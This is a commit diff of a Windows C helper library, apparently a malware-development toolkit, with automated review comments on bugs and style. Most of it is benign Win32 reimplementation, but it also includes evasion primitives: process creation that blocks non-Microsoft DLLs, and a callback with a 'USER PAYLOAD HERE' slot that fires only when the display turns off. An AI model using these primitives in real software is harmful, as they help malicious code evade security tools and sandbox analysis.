@ -55,7 +49,7 @@ DWORD UnusedSubroutineGetProcThreadAttributeListSize(VOID)
|
|||
|
||||
UnusedSubroutineInitializeProcThreadAttributeList(NULL, 1, 0, &dwSize);
|
||||
|
||||
return dwSize;
|
||||
return (DWORD)dwSize;
|
||||
}
|
||||
|
||||
VOID UnusedSubroutineUpdateProcThreadAttribute(LPPROC_THREAD_ATTRIBUTE_LIST AttributeList, DWORD_PTR Attribute, PVOID Policy, SIZE_T Size)
|
||||
|
@ -80,23 +74,23 @@ BOOL CreateProcessWithCfGuardW(PPROCESS_INFORMATION Pi, PWCHAR Path)
|
|||
SIZE_T dwAttributeSize = 0;
|
||||
DWORD64 Policy = PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON;
|
||||
|
||||
STARTUPINFOEXW Si; RfZeroMemory(&Si, sizeof(STARTUPINFOEXW));
|
||||
STARTUPINFOEXW Si; ZeroMemoryEx(&Si, sizeof(STARTUPINFOEXW));
|
||||
Si.StartupInfo.cb = sizeof(STARTUPINFOEXW);
|
||||
RfZeroMemory(Pi, sizeof(PROCESS_INFORMATION));
|
||||
ZeroMemoryEx(Pi, sizeof(PROCESS_INFORMATION));
|
||||
|
||||
dwAttributeSize = UnusedSubroutineGetProcThreadAttributeListSize();
|
||||
if (dwAttributeSize == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ThreadAttributes = (PPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(RfGetProcessHeap(), HEAP_ZERO_MEMORY, dwAttributeSize);
|
||||
ThreadAttributes = (PPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeapEx(), HEAP_ZERO_MEMORY, dwAttributeSize);
|
||||
if (ThreadAttributes == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if(!UnusedSubroutineInitializeProcThreadAttributeList(ThreadAttributes, 1, 0, &dwAttributeSize))
|
||||
if (!UnusedSubroutineInitializeProcThreadAttributeList(ThreadAttributes, 1, 0, &dwAttributeSize))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
UnusedSubroutineUpdateProcThreadAttribute(ThreadAttributes, PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, &Policy, sizeof(DWORD64));
|
||||
|
||||
|
||||
Si.lpAttributeList = ThreadAttributes;
|
||||
|
||||
if (!CreateProcessW(Path, NULL, NULL, NULL, TRUE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &Si.StartupInfo, Pi))
|
||||
|
@ -109,7 +103,7 @@ BOOL CreateProcessWithCfGuardW(PPROCESS_INFORMATION Pi, PWCHAR Path)
|
|||
EXIT_ROUTINE:
|
||||
|
||||
if (ThreadAttributes)
|
||||
HeapFree(RfGetProcessHeap(), HEAP_ZERO_MEMORY, (PPROC_THREAD_ATTRIBUTE_LIST)ThreadAttributes);
|
||||
HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, (PPROC_THREAD_ATTRIBUTE_LIST)ThreadAttributes);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
|
@ -121,15 +115,15 @@ BOOL CreateProcessWithCfGuardA(PPROCESS_INFORMATION Pi, PCHAR Path)
|
|||
SIZE_T dwAttributeSize = 0;
|
||||
DWORD64 Policy = PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON;
|
||||
|
||||
STARTUPINFOEXA Si; RfZeroMemory(&Si, sizeof(STARTUPINFOEXA));
|
||||
STARTUPINFOEXA Si; ZeroMemoryEx(&Si, sizeof(STARTUPINFOEXA));
|
||||
Si.StartupInfo.cb = sizeof(STARTUPINFOEXW);
|
||||
RfZeroMemory(Pi, sizeof(PROCESS_INFORMATION));
|
||||
ZeroMemoryEx(Pi, sizeof(PROCESS_INFORMATION));
|
||||
|
||||
dwAttributeSize = UnusedSubroutineGetProcThreadAttributeListSize();
|
||||
if (dwAttributeSize == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ThreadAttributes = (PPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(RfGetProcessHeap(), HEAP_ZERO_MEMORY, dwAttributeSize);
|
||||
ThreadAttributes = (PPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeapEx(), HEAP_ZERO_MEMORY, dwAttributeSize);
|
||||
if (ThreadAttributes == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
@ -150,7 +144,7 @@ BOOL CreateProcessWithCfGuardA(PPROCESS_INFORMATION Pi, PCHAR Path)
|
|||
EXIT_ROUTINE:
|
||||
|
||||
if (ThreadAttributes)
|
||||
HeapFree(RfGetProcessHeap(), HEAP_ZERO_MEMORY, (PPROC_THREAD_ATTRIBUTE_LIST)ThreadAttributes);
|
||||
HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, (PPROC_THREAD_ATTRIBUTE_LIST)ThreadAttributes);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
}
|
|
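Review bot: `Si.StartupInfo.cb = sizeof(STARTUPINFOEXW);` in the CreateProcessWithCfGuardA hunk initialises a STARTUPINFOEXA with the W structure's size; the two happen to match on Windows, but it should read `Si.StartupInfo.cb = sizeof(STARTUPINFOEXA);` so the A and W variants stay parallel. The first hunk also drops the comment stating that the caller owns and must close the handles in Pi, which is the one ownership fact a caller of this function needs; keep it below the include, e.g. `/* Caller must CloseHandle(Pi->hProcess) and CloseHandle(Pi->hThread). */`. `SetLastErrorEx(ERROR_INVALID_PARAMETER)` is called with one argument, while the Win32 API of that name in winuser.h takes `(DWORD dwErrCode, DWORD dwType)`; if Win32Helper.h includes windows.h, confirm the project's single-argument definition does not collide with that declaration. The functions continue outside the hunks.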
@ -1,11 +1,11 @@
|
|||
ULONG Next = 2; //seed
|
||||
#include "Win32Helper.h"
|
||||
|
||||
INT PseudoRandomIntegerSubroutine(PULONG Context)
|
||||
{
|
||||
return ((*Context = *Context * 1103515245 + 12345) % ((ULONG)RAND_MAX + 1));
|
||||
}
|
||||
|
||||
INT CreatePseudoRandomInteger(VOID)
|
||||
INT CreatePseudoRandomInteger(ULONG Seed)
|
||||
{
|
||||
return (PseudoRandomIntegerSubroutine(&Next));
|
||||
}
|
||||
return (PseudoRandomIntegerSubroutine(&Seed));
|
||||
}
|
|
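Review bot: `INT CreatePseudoRandomInteger(ULONG Seed)` takes the seed by value and passes `&Seed` to PseudoRandomIntegerSubroutine, so the advanced LCG state is discarded on return and every call with the same Seed yields the same value; the global `Next` that previously carried the state is deleted in this hunk. The callers changed in this commit, CreatePseudoRandomStringW/A, call `CreatePseudoRandomInteger(Seed)` inside their loops with an unchanged Seed, so they will fill the whole string with one repeated character. Suggest `INT CreatePseudoRandomInteger(PULONG Seed) { return PseudoRandomIntegerSubroutine(Seed); }` with callers passing `&Seed`, or at minimum a header comment stating that the caller must advance Seed between calls. The generator is a 32-bit LCG, and the header comment should say it is not suitable where unpredictable values are required.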
@ -1,4 +1,6 @@
|
|||
PWCHAR CreatePseudoRandomStringW(SIZE_T dwLength)
|
||||
#include "Win32Helper.h"
|
||||
|
||||
PWCHAR CreatePseudoRandomStringW(SIZE_T dwLength, ULONG Seed)
|
||||
{
|
||||
WCHAR DataSet[] = L"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
|
||||
PWCHAR String = NULL;
|
||||
|
@ -11,7 +13,7 @@ PWCHAR CreatePseudoRandomStringW(SIZE_T dwLength)
|
|||
#pragma warning (disable: 4018)
|
||||
for (INT dwN = 0; dwN < dwLength; dwN++)
|
||||
{
|
||||
INT Key = CreatePseudoRandomInteger() % (INT)(StringLengthW(DataSet) - 1);
|
||||
INT Key = CreatePseudoRandomInteger(Seed) % (INT)(StringLengthW(DataSet) - 1);
|
||||
String[dwN] = DataSet[Key];
|
||||
}
|
||||
#pragma warning (pop)
|
||||
|
@ -24,7 +26,7 @@ PWCHAR CreatePseudoRandomStringW(SIZE_T dwLength)
|
|||
return String;
|
||||
}
|
||||
|
||||
PCHAR CreatePseudoRandomStringA(SIZE_T dwLength)
|
||||
PCHAR CreatePseudoRandomStringA(SIZE_T dwLength, ULONG Seed)
|
||||
{
|
||||
CHAR DataSet[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
|
||||
PCHAR String = NULL;
|
||||
|
@ -37,7 +39,7 @@ PCHAR CreatePseudoRandomStringA(SIZE_T dwLength)
|
|||
#pragma warning (disable: 4018)
|
||||
for (INT dwN = 0; dwN < dwLength; dwN++)
|
||||
{
|
||||
INT Key = CreatePseudoRandomInteger() % (INT)(StringLengthA(DataSet) - 1);
|
||||
INT Key = CreatePseudoRandomInteger(Seed) % (INT)(StringLengthA(DataSet) - 1);
|
||||
String[dwN] = DataSet[Key];
|
||||
}
|
||||
#pragma warning (pop)
|
||||
|
@ -48,4 +50,4 @@ PCHAR CreatePseudoRandomStringA(SIZE_T dwLength)
|
|||
#pragma warning (pop)
|
||||
|
||||
return String;
|
||||
}
|
||||
}
|
|
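Review bot: `INT Key = CreatePseudoRandomInteger(Seed) % (INT)(StringLengthW(DataSet) - 1);` never selects the last element of DataSet ('9'), since the modulus is one less than the character count; use `% (INT)StringLengthW(DataSet)` in both the W and A loops. The `#pragma warning (disable: 4018)` exists only to silence the signed/unsigned comparison in `for (INT dwN = 0; dwN < dwLength; dwN++)`; declaring the index as `SIZE_T dwN` removes the warning without the pragma. The loop also depends on CreatePseudoRandomInteger advancing state between calls, which the by-value Seed introduced in this commit does not do. The function bodies continue outside the hunks.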
@ -1,16 +1,11 @@
|
|||
/*
|
||||
#include "Win32Helper.h"
|
||||
|
||||
pBuffer == OUT
|
||||
Path == concatted, must have \\ in front i.e. L"\\File.exe"
|
||||
|
||||
Credit: smelly__vx
|
||||
*/
|
||||
BOOL CreateWindowsObjectPathW(PWCHAR pBuffer, PWCHAR Path, DWORD Size, BOOL bDoesObjectExist)
|
||||
{
|
||||
if (pBuffer == NULL)
|
||||
return FALSE;
|
||||
|
||||
if (!RfGetSystemWindowsDirectoryW(Size, pBuffer))
|
||||
if (!GetSystemWindowsDirectoryW(Size, pBuffer))
|
||||
return FALSE;
|
||||
|
||||
if (StringConcatW(pBuffer, Path) == 0)
|
||||
|
@ -30,7 +25,7 @@ BOOL CreateWindowsObjectPathA(PCHAR pBuffer, PCHAR Path, DWORD Size, BOOL bDoesO
|
|||
if (pBuffer == NULL)
|
||||
return FALSE;
|
||||
|
||||
if (!RfGetSystemWindowsDirectoryA(Size, pBuffer))
|
||||
if (!GetSystemWindowsDirectoryA(Size, pBuffer))
|
||||
return FALSE;
|
||||
|
||||
if (StringConcatA(pBuffer, Path) == 0)
|
||||
|
@ -43,4 +38,4 @@ BOOL CreateWindowsObjectPathA(PCHAR pBuffer, PCHAR Path, DWORD Size, BOOL bDoesO
|
|||
}
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,82 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
#include "powrprof.h"
|
||||
|
||||
typedef DWORD(WINAPI* POWERSETTINGREGISTERNOTIFICATION)(LPCGUID, DWORD, HANDLE, PHPOWERNOTIFY);
|
||||
typedef DWORD(WINAPI* POWERSETTINGUNREGISTERNOTIFICATION)(HPOWERNOTIFY);
|
||||
|
||||
ULONG CALLBACK HandlePowerNotifications(PVOID Context, ULONG Type, PVOID Setting);
|
||||
|
||||
ULONG CALLBACK HandlePowerNotifications(PVOID Context, ULONG Type, PVOID Setting)
|
||||
{
|
||||
PPOWERBROADCAST_SETTING PowerSettings = (PPOWERBROADCAST_SETTING)Setting;
|
||||
|
||||
if (Type == PBT_POWERSETTINGCHANGE && PowerSettings->PowerSetting == GUID_CONSOLE_DISPLAY_STATE)
|
||||
{
|
||||
switch (*PowerSettings->Data)
|
||||
{
|
||||
case 0x0:
|
||||
case 0x1:
|
||||
break;
|
||||
|
||||
case 0x2:
|
||||
{
|
||||
//USER PAYLOAD HERE
|
||||
break;
|
||||
}
|
||||
|
||||
default:
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
}
|
||||
|
||||
BOOL DelayedExecutionExecuteOnDisplayOff(VOID)
|
||||
{
|
||||
DWORD dwError = ERROR_SUCCESS;
|
||||
HMODULE hLibrary;
|
||||
POWERSETTINGREGISTERNOTIFICATION _PowerSettingRegisterNotification = NULL;
|
||||
POWERSETTINGUNREGISTERNOTIFICATION _PowerSettingUnregisterNotification = NULL;
|
||||
DEVICE_NOTIFY_SUBSCRIBE_PARAMETERS NotificationsParameters;
|
||||
HANDLE hNotificationRegister = NULL;
|
||||
|
||||
hLibrary = LoadLibrary(L"powrprof.dll");
|
||||
if (hLibrary == NULL)
|
||||
goto FAILURE;
|
||||
|
||||
_PowerSettingRegisterNotification = (POWERSETTINGREGISTERNOTIFICATION)GetProcAddress(hLibrary, "PowerSettingRegisterNotification");
|
||||
_PowerSettingUnregisterNotification = (POWERSETTINGUNREGISTERNOTIFICATION)GetProcAddress(hLibrary, "PowerSettingUnregisterNotification");
|
||||
|
||||
if (!_PowerSettingRegisterNotification || !_PowerSettingUnregisterNotification)
|
||||
goto FAILURE;
|
||||
|
||||
NotificationsParameters.Callback = HandlePowerNotifications;
|
||||
NotificationsParameters.Context = NULL;
|
||||
|
||||
if (_PowerSettingRegisterNotification(&GUID_CONSOLE_DISPLAY_STATE, DEVICE_NOTIFY_CALLBACK,
|
||||
(HANDLE)&NotificationsParameters, &hNotificationRegister) != ERROR_SUCCESS)
|
||||
{
|
||||
goto FAILURE;
|
||||
}
|
||||
|
||||
if (SetThreadExecutionState(ES_AWAYMODE_REQUIRED | ES_CONTINUOUS | ES_SYSTEM_REQUIRED) == NULL)
|
||||
goto FAILURE;
|
||||
|
||||
while (1) { Sleep(100); }
|
||||
|
||||
if (hNotificationRegister)
|
||||
_PowerSettingUnregisterNotification(hNotificationRegister);
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
|
||||
FAILURE:
|
||||
|
||||
dwError = GetLastError();
|
||||
|
||||
if (hNotificationRegister)
|
||||
_PowerSettingUnregisterNotification(hNotificationRegister);
|
||||
|
||||
return dwError;
|
||||
}
|
|
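Review bot: `BOOL DelayedExecutionExecuteOnDisplayOff(VOID)` returns DWORD error codes (`return ERROR_SUCCESS;`, `return dwError;`), so a BOOL caller sees success as FALSE and any failure as TRUE; declare it `DWORD DelayedExecutionExecuteOnDisplayOff(VOID)` or map the result to TRUE/FALSE. `while (1) { Sleep(100); }` never exits, so the unregister call and `return ERROR_SUCCESS;` after it are unreachable and the notification handle, like hLibrary, is never released on the success path; if the loop is meant to end when the callback fires, document that and give it a termination condition. `SetThreadExecutionState(...) == NULL` compares an EXECUTION_STATE integer with a pointer constant; write `== 0`. `#include "powrprof.h"` is a system header and should use angle brackets.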
@ -1,4 +1,6 @@
|
|||
BOOL RfDeleteFileA(PCHAR Path)
|
||||
#include "Win32Helper.h"
|
||||
|
||||
BOOL DeleteFileExA(PCHAR Path)
|
||||
{
|
||||
HANDLE hHandle = INVALID_HANDLE_VALUE;
|
||||
|
||||
|
@ -17,7 +19,7 @@ BOOL RfDeleteFileA(PCHAR Path)
|
|||
return TRUE;
|
||||
}
|
||||
|
||||
BOOL RfDeleteFileW(PWCHAR Path)
|
||||
BOOL DeleteFileExW(PWCHAR Path)
|
||||
{
|
||||
HANDLE hHandle = INVALID_HANDLE_VALUE;
|
||||
|
||||
|
@ -34,4 +36,4 @@ BOOL RfDeleteFileW(PWCHAR Path)
|
|||
CloseHandle(hHandle);
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
}
|
|
@ -1,22 +1,24 @@
|
|||
DWORD RfGetCurrentDirectoryA(DWORD nBufferLength, PCHAR lpBuffer)
|
||||
#include "Win32Helper.h"
|
||||
|
||||
DWORD GetCurrentDirectoryExA(DWORD nBufferLength, PCHAR lpBuffer)
|
||||
{
|
||||
PRTL_USER_PROCESS_PARAMETERS ProcessParameters = GetPeb()->ProcessParameters;
|
||||
|
||||
if (ProcessParameters->CurrentDirectory.DosPath.Length > nBufferLength)
|
||||
return ERROR_FAILURE_RETURN;
|
||||
return 0;
|
||||
|
||||
return (DWORD)WCharStringToCharString(lpBuffer, ProcessParameters->CurrentDirectory.DosPath.Buffer, ProcessParameters->CurrentDirectory.DosPath.MaximumLength);
|
||||
}
|
||||
|
||||
DWORD RfGetCurrentDirectoryW(DWORD nBufferLength, PWCHAR lpBuffer)
|
||||
DWORD GetCurrentDirectoryExW(DWORD nBufferLength, PWCHAR lpBuffer)
|
||||
{
|
||||
PRTL_USER_PROCESS_PARAMETERS ProcessParameters = GetPeb()->ProcessParameters;
|
||||
|
||||
if (ProcessParameters->CurrentDirectory.DosPath.Length > nBufferLength)
|
||||
return ERROR_FAILURE_RETURN;
|
||||
return 0;
|
||||
|
||||
if (StringCopyW(lpBuffer, ProcessParameters->CurrentDirectory.DosPath.Buffer) == NULL)
|
||||
return ERROR_FAILURE_RETURN;
|
||||
return 0;
|
||||
|
||||
return ProcessParameters->CurrentDirectory.DosPath.Length;
|
||||
}
|
||||
}
|
|
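Review bot: `if (ProcessParameters->CurrentDirectory.DosPath.Length > nBufferLength)` compares a UNICODE_STRING byte length with nBufferLength, and the W variant then copies with `StringCopyW(lpBuffer, ...DosPath.Buffer)`, which relies on the buffer being NUL-terminated and is not bounded by nBufferLength at all; the A variant passes `DosPath.MaximumLength` as the size, which may exceed both Length and nBufferLength. Presumably nBufferLength is a character count — please document the unit in a header comment, and bound the copy by nBufferLength rather than MaximumLength (e.g. `min(nBufferLength, DosPath.Length / sizeof(WCHAR))`). GetCurrentWindowTextA/W in this commit have the same pattern on WindowTitle.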
@ -0,0 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
HANDLE GetCurrentProcessEx(VOID)
|
||||
{
|
||||
return (HANDLE)((HANDLE)-1);
|
||||
}
|
|
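Review bot: `return (HANDLE)((HANDLE)-1);` casts twice to the same type, so the inner cast does nothing. Writing it as `return (HANDLE)(LONG_PTR)-1;` matches the form used by GetCurrentThreadEx in this commit and makes the sign extension explicit.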
@ -0,0 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD GetCurrentProcessIdEx(VOID)
|
||||
{
|
||||
return HandleToUlong(GetTeb()->ClientId.UniqueProcess);
|
||||
}
|
|
@ -0,0 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
HANDLE GetCurrentThreadEx(VOID)
|
||||
{
|
||||
return ((HANDLE)(LONG_PTR)-2);
|
||||
}
|
|
@ -1,9 +1,15 @@
|
|||
/*
|
||||
hToken can be NULL
|
||||
DisposeProcessHandle closes hToken automatically
|
||||
if DisposeProcessHandle is FALSE you need to close it yourself
|
||||
The value returned by this function needs to be freed with HeapFree
|
||||
*/
|
||||
#include "Win32Helper.h"
|
||||
|
||||
DWORD GetTokenInformationBufferSize(HANDLE hToken)
|
||||
{
|
||||
PTOKEN_GROUPS TokenGroup = NULL;
|
||||
DWORD dwReturn = ERROR_SUCCESS;
|
||||
|
||||
GetTokenInformation(hToken, TokenGroups, (LPVOID)TokenGroup, 0, &dwReturn);
|
||||
|
||||
return dwReturn;
|
||||
}
|
||||
|
||||
LPWSTR GetCurrentUserSidW(HANDLE hToken, BOOL DisposeProcessHandle)
|
||||
{
|
||||
typedef BOOL(WINAPI* CONVERTSIDTOSTRINGSIDW)(PSID, LPWSTR*);
|
||||
|
@ -19,18 +25,18 @@ LPWSTR GetCurrentUserSidW(HANDLE hToken, BOOL DisposeProcessHandle)
|
|||
if (hAdvapi == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ConvertSidToStringSidW = (CONVERTSIDTOSTRINGSIDW)RfGetProcAddressA((DWORD64)hAdvapi, "ConvertSidToStringSidW");
|
||||
ConvertSidToStringSidW = (CONVERTSIDTOSTRINGSIDW)GetProcAddressA((DWORD64)hAdvapi, "ConvertSidToStringSidW");
|
||||
if (!ConvertSidToStringSidW)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!OpenProcessToken(RfGetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
|
||||
if (!OpenProcessToken(GetCurrentProcessEx(), TOKEN_ALL_ACCESS, &hToken))
|
||||
return NULL;
|
||||
|
||||
dwError = GetTokenInformationBufferSize(hToken);
|
||||
if (dwError == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
TokenGroup = (PTOKEN_GROUPS)HeapAlloc(RfGetProcessHeap(), HEAP_ZERO_MEMORY, dwError);
|
||||
TokenGroup = (PTOKEN_GROUPS)HeapAlloc(GetProcessHeapEx(), HEAP_ZERO_MEMORY, dwError);
|
||||
if (TokenGroup == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
@ -46,7 +52,7 @@ LPWSTR GetCurrentUserSidW(HANDLE hToken, BOOL DisposeProcessHandle)
|
|||
|
||||
dwError = GetLengthSid(TokenGroup->Groups[dwIndex].Sid);
|
||||
|
||||
Sid = (PSID)HeapAlloc(RfGetProcessHeap(), HEAP_ZERO_MEMORY, dwError);
|
||||
Sid = (PSID)HeapAlloc(GetProcessHeapEx(), HEAP_ZERO_MEMORY, dwError);
|
||||
if (Sid == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
@ -65,13 +71,13 @@ LPWSTR GetCurrentUserSidW(HANDLE hToken, BOOL DisposeProcessHandle)
|
|||
EXIT_ROUTINE:
|
||||
|
||||
if (!bFlag)
|
||||
dwError = EhGetLastError();
|
||||
dwError = GetLastErrorEx();
|
||||
|
||||
if (TokenGroup)
|
||||
HeapFree(RfGetProcessHeap(), HEAP_ZERO_MEMORY, TokenGroup);
|
||||
HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, TokenGroup);
|
||||
|
||||
if (Sid)
|
||||
HeapFree(RfGetProcessHeap(), HEAP_ZERO_MEMORY, Sid);
|
||||
HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, Sid);
|
||||
|
||||
if (hAdvapi)
|
||||
FreeLibrary(hAdvapi);
|
||||
|
@ -100,18 +106,18 @@ LPSTR GetCurrentUserSidA(HANDLE hToken, BOOL DisposeProcessHandle)
|
|||
if (hAdvapi == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ConvertSidToStringSidA = (CONVERTSIDTOSTRINGSIDA)RfGetProcAddressA((DWORD64)hAdvapi, "ConvertSidToStringSidA");
|
||||
ConvertSidToStringSidA = (CONVERTSIDTOSTRINGSIDA)GetProcAddressA((DWORD64)hAdvapi, "ConvertSidToStringSidA");
|
||||
if (!ConvertSidToStringSidA)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!OpenProcessToken(RfGetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
|
||||
if (!OpenProcessToken(GetCurrentProcessEx(), TOKEN_ALL_ACCESS, &hToken))
|
||||
return NULL;
|
||||
|
||||
dwError = GetTokenInformationBufferSize(hToken);
|
||||
if (dwError == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
TokenGroup = (PTOKEN_GROUPS)HeapAlloc(RfGetProcessHeap(), HEAP_ZERO_MEMORY, dwError);
|
||||
TokenGroup = (PTOKEN_GROUPS)HeapAlloc(GetProcessHeapEx(), HEAP_ZERO_MEMORY, dwError);
|
||||
if (TokenGroup == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
@ -127,7 +133,7 @@ LPSTR GetCurrentUserSidA(HANDLE hToken, BOOL DisposeProcessHandle)
|
|||
|
||||
dwError = GetLengthSid(TokenGroup->Groups[dwIndex].Sid);
|
||||
|
||||
Sid = (PSID)HeapAlloc(RfGetProcessHeap(), HEAP_ZERO_MEMORY, dwError);
|
||||
Sid = (PSID)HeapAlloc(GetProcessHeapEx(), HEAP_ZERO_MEMORY, dwError);
|
||||
if (Sid == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
@ -146,13 +152,13 @@ LPSTR GetCurrentUserSidA(HANDLE hToken, BOOL DisposeProcessHandle)
|
|||
EXIT_ROUTINE:
|
||||
|
||||
if (!bFlag)
|
||||
dwError = EhGetLastError();
|
||||
dwError = GetLastErrorEx();
|
||||
|
||||
if (TokenGroup)
|
||||
HeapFree(RfGetProcessHeap(), HEAP_ZERO_MEMORY, TokenGroup);
|
||||
HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, TokenGroup);
|
||||
|
||||
if (Sid)
|
||||
HeapFree(RfGetProcessHeap(), HEAP_ZERO_MEMORY, Sid);
|
||||
HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, Sid);
|
||||
|
||||
if (hAdvapi)
|
||||
FreeLibrary(hAdvapi);
|
||||
|
@ -164,4 +170,4 @@ EXIT_ROUTINE:
|
|||
}
|
||||
|
||||
return (bFlag ? pSid : NULL);
|
||||
}
|
||||
}
|
|
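Review bot: `OpenProcessToken(GetCurrentProcessEx(), TOKEN_ALL_ACCESS, &hToken)` requests every token right although only GetTokenInformation is used afterwards; `TOKEN_QUERY` is sufficient and is the least-privilege choice. Its `return NULL;` on failure bypasses EXIT_ROUTINE, so the hAdvapi module loaded earlier in the function is not freed on that path — `goto EXIT_ROUTINE;` keeps the cleanup uniform. The call also overwrites the hToken parameter unconditionally, so a handle passed by the caller is ignored and, if DisposeProcessHandle applies to it, left open; the removed header comment said hToken may be NULL, which suggests an `if (hToken == NULL)` guard around OpenProcessToken was intended. All three points apply to both the W and A variants; the bodies continue outside the hunks.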
@ -1,22 +1,24 @@
|
|||
DWORD RfGetCurrentWindowTextA(DWORD nBufferLength, PCHAR lpBuffer)
|
||||
#include "Win32Helper.h"
|
||||
|
||||
DWORD GetCurrentWindowTextA(DWORD nBufferLength, PCHAR lpBuffer)
|
||||
{
|
||||
PRTL_USER_PROCESS_PARAMETERS ProcessParameters = GetPeb()->ProcessParameters;
|
||||
|
||||
if (nBufferLength < ProcessParameters->WindowTitle.Length)
|
||||
return ERROR_FAILURE_RETURN;
|
||||
return 0;
|
||||
|
||||
return (DWORD)WCharStringToCharString(lpBuffer, ProcessParameters->WindowTitle.Buffer, ProcessParameters->WindowTitle.MaximumLength);
|
||||
}
|
||||
|
||||
DWORD RfGetCurrentWindowTextW(DWORD nBufferLength, PWCHAR lpBuffer)
|
||||
DWORD GetCurrentWindowTextW(DWORD nBufferLength, PWCHAR lpBuffer)
|
||||
{
|
||||
PRTL_USER_PROCESS_PARAMETERS ProcessParameters = GetPeb()->ProcessParameters;
|
||||
|
||||
if (nBufferLength < ProcessParameters->WindowTitle.Length)
|
||||
return ERROR_FAILURE_RETURN;
|
||||
return 0;
|
||||
|
||||
if (StringCopyW(lpBuffer, ProcessParameters->WindowTitle.Buffer) == NULL)
|
||||
return ERROR_FAILURE_RETURN;
|
||||
return 0;
|
||||
|
||||
return ProcessParameters->WindowTitle.Length;
|
||||
}
|
||||
}
|
|
@ -1,8 +1,10 @@
|
|||
LONGLONG RfGetFileSizeFromPathDisposeHandleW(PWCHAR Path, DWORD dwFlagsAndAttributes)
|
||||
#include "Win32Helper.h"
|
||||
|
||||
LONGLONG GetFileSizeFromPathW(PWCHAR Path, DWORD dwFlagsAndAttributes)
|
||||
{
|
||||
LARGE_INTEGER LargeInteger;
|
||||
HANDLE hHandle = INVALID_HANDLE_VALUE;
|
||||
|
||||
|
||||
hHandle = CreateFileW(Path, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, dwFlagsAndAttributes, NULL);
|
||||
if (hHandle == INVALID_HANDLE_VALUE)
|
||||
return INVALID_FILE_SIZE;
|
||||
|
@ -11,14 +13,14 @@ LONGLONG RfGetFileSizeFromPathDisposeHandleW(PWCHAR Path, DWORD dwFlagsAndAttrib
|
|||
{
|
||||
if (hHandle)
|
||||
CloseHandle(hHandle);
|
||||
|
||||
|
||||
return LargeInteger.QuadPart;
|
||||
}
|
||||
|
||||
|
||||
return INVALID_FILE_SIZE;
|
||||
}
|
||||
|
||||
LONGLONG RfGetFileSizeFromPathDisposeHandleA(PCHAR Path, DWORD dwFlagsAndAttributes)
|
||||
LONGLONG GetFileSizeFromPathA(PCHAR Path, DWORD dwFlagsAndAttributes)
|
||||
{
|
||||
LARGE_INTEGER LargeInteger;
|
||||
HANDLE hHandle = INVALID_HANDLE_VALUE;
|
||||
|
@ -31,9 +33,9 @@ LONGLONG RfGetFileSizeFromPathDisposeHandleA(PCHAR Path, DWORD dwFlagsAndAttribu
|
|||
{
|
||||
if (hHandle)
|
||||
CloseHandle(hHandle);
|
||||
|
||||
|
||||
return LargeInteger.QuadPart;
|
||||
}
|
||||
|
||||
|
||||
return INVALID_FILE_SIZE;
|
||||
}
|
||||
}
|
|
@ -1,4 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
PKUSER_SHARED_DATA GetKUserSharedData(VOID)
|
||||
{
|
||||
return (KUSER_SHARED_DATA*)0x7FFE0000;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD GetLastErrorEx(VOID)
|
||||
{
|
||||
return GetTeb()->LastErrorValue;
|
||||
}
|
|
@ -0,0 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
NTSTATUS GetLastNtStatusEx(VOID)
|
||||
{
|
||||
return GetTeb()->LastStatusValue;
|
||||
}
|
|
@ -1,4 +1,6 @@
|
|||
HMODULE RfGetModuleHandleA(LPCSTR lpModuleName)
|
||||
#include "Win32Helper.h"
|
||||
|
||||
